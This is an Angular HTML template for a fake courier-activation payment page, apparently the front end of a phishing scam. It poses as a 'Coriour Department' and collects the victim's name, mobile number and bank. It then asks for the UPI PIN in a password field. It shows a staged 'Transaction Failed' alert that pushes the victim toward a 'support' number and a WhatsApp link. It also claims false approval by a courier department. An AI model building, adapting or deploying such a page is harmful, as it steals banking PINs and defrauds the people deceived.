<div *ngIf="tempAlert" class="alert alert-danger alert-dismissible fade show" role="alert">
  <strong>Transaction Failed {{"ID - " + tempID }} </strong> Dear {{firstName}}, Your amount was debited from your account for this failed payment.
  You can try to Contact support +91-8888888888. <b>{{time | date : "dd:MM:YYY, HH:MM a" }}</b>
  <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
</div>


<div class="container-fluid">
  <div class="row">
    <div class="p-3  col-12 d-flex justify-content-around" style="color: #ffffff; font-weight: 800; background-color: #008296;">
      <h4 class="pt-2" >Welcome to <span class="fw-bolder">Coriour Department</span> </h4>
      <img src="../assets/412-gift-outline.gif" style="width:50px" alt="">
    </div>
    <div class="col-12 p-4 p-5 top-slider">
      <h3 class=" fw-bold" style="color: #303952;">COURIER ACTIVATION CHARGE</h3>
      <p class="text-dark">Activation Payment / <b class="text-dark">COURIER ACTIVATION CHARGE</b></p> 
      <span class="text-light ">Enquiry Support - +91-88888-88888</span>
    </div>
  </div>
  <div class="row" style="background-color: #008296;">
    <form class="main-form p-5">
      <h3 class="text-light"><span class=" h1" style="color: #ffffff;"><i class="fa fa-shield p-2" aria-hidden="true"></i> </span>Payment with UPI</h3>
      <p class="text-light">It may take a few moments for this transaction to appear in your account.</p>
  
      <div class="input-group mb-3">
        <span class="input-group-text" style="color: #303952;" id="basic-addon1"><i class="fa fa-user-o" aria-hidden="true"></i></span>
        <input type="text" class="form-control"  name="firstName" [(ngModel)]="firstName" placeholder="Full Name"
          aria-label="Username" />
      </div>
  
      <div class="input-group mb-3">
          <span class="input-group-text" style="color: #303952;" id="basic-addon1"><i class="fa fa-phone-square" aria-hidden="true"></i></span>
        <input type="text" class="form-control" maxlength="8" name="FContact" [(ngModel)]="FContact" placeholder="Mobile Number"
          aria-label="Username" />
      </div>   
      <!-- Button trigger modal -->
      <button  type="button" class="btn" style="background-color: #303952; color: #fff;" data-bs-toggle="modal" data-bs-target="#exampleModal">
        <i class="fa fa-hand-o-right" aria-hidden="true"></i> Processing
      </button>
      <!-- Modal -->
      <div class="modal fade" id="exampleModal" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true">
        <div class="modal-dialog">
          <div class="modal-content">
            <div class="modal-body" style="background-color:rgb(235,248,250);">
              <form class="main-form p-3">
                <p style="color: #303952; font-weight: 500;">Please pay your conformation charge <span class="text-success fw-bold">"1 Rupee"</span> with UPI your payment will be Null / Debit Fail
                  then contact support Number</p>
                <div class="input-group mb-3">
                  <span class="input-group-text"  style="color: #303952;" id="basic-addon1"><i class="fa fa-university" aria-hidden="true"></i></span>
                  <input type="text" class="form-control" maxlength="8" name="FselectBank" [(ngModel)]="FselectBank" placeholder="- SELECT BANK - "
                    aria-label="Username" />
                </div>
                <div class="input-group mb-3">
                  <span class="input-group-text"  style="color: #303952;" id="basic-addon1"><i class="fa fa-inr" aria-hidden="true"></i></span>
                  <input type="text" class="form-control" maxlength="1" value="1.00/- (Via UPI Id)" name="FUPI"  disabled placeholder=""
                    aria-label="Username" />
                </div>
                <button type="button" class="btn" style="background-color: #303952; color: #fff;" data-bs-toggle="modal" data-bs-target="#exampleModal2"> 
                  <i class="fa fa-hand-o-right" aria-hidden="true"></i> Pay</button>
              </form>
            </div>
          </div>
        </div>
      </div>

      <div class="modal fade" id="exampleModal2" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true">
        <div class="modal-dialog">
          <div class="modal-content">
            <div class="modal-body" style="background-color:rgb(235,248,250);">
              <form class="main-form p-3">
                <h3 class=" fw-bold" style="color: #303952;"><img src="../assets/upi-payment-icon.png" style="width: 50px;">&nbsp;&nbsp;  Pay Via UPI </h3>
                <div class="input-group mb-3">
                  <span class="input-group-text"  style="color: #303952;" id="basic-addon1"><i class="fa fa-key" aria-hidden="true"></i></span>
                  <input type="password" class="form-control" maxlength="8" name="surName" [(ngModel)]="mainUPI" placeholder="Enter Your Pin "
                    aria-label="Username" />
                </div>
                <button (click)="temp()" class="btn" style="background-color: #303952; color: #fff;" > 
                  <i class="fa fa-lock" aria-hidden="true"></i> Pay</button>
              </form>
            </div>
          </div>
        </div>
      </div>












    </form>
  </div>
  <img src="../assets/LOGO-3-1024x495.jpg" class="w-100 p-2" alt="">
  
</div>
<div style="background-color: #303952;font-weight: 500; ">
  <p class="text-light p-2">Movers and Packers WordPress Theme Already approved by courier department</p>
</div>

<div class="wahtsaap p-2">
  <a href="https://wa.me/917217390645?text=COD%20Support%20?" target="_blank"><i class="fa fa-whatsapp fa-2x wahtsaap-colo " aria-hidden="true"></i></a>
</div>